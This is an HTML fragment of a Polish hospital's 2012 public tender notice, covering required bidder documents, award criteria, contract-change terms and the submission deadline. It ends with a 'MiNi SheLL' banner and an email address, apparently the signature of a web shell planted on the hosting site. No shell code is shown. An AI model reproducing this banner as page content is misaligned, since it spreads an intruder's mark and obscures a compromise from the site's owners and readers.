<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">5)	Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oświadczenie o braku podstaw do wykluczenia o treści Załącznika Nr 4 do SIWZ
2)	Aktualny odpis z właściwego rejestru dotyczący prowadzonej działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy PZP.
1)	Wypełniony formularz oferty - załącznik nr 1 do SIWZ 
2)	Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy  - Załącznik nr 7.
3)	Załącznik nr 8 - oświadczenie o zapoznaniu się z obiektem - poświadczone przez Zamawiającego.
4)	Dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwości zmian niniejszej umowy w przypadku wystąpienie okoliczności, których nie można było przewiedzieć w chwili zawarcia umowy:
1)	 wprowadzenie wszelkich zmian wynikających z okoliczności, których nie dało się przewidzieć, a zmiany te są korzystne dla Zamawiającego,
2)	w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno - prawnych mających wpływ na terminy realizacji zamówienia,
3)	zmiany sposobu realizacji umowy, gdy zmiana jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , 01-211 Warszawa ul. Kasprzaka 17, pawilon nr 8, Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2012 godzina 11:00, miejsce: Szpital Wolski im dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , 01-211 Warszawa ul. Kasprzaka 17, pawilon nr 2, Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com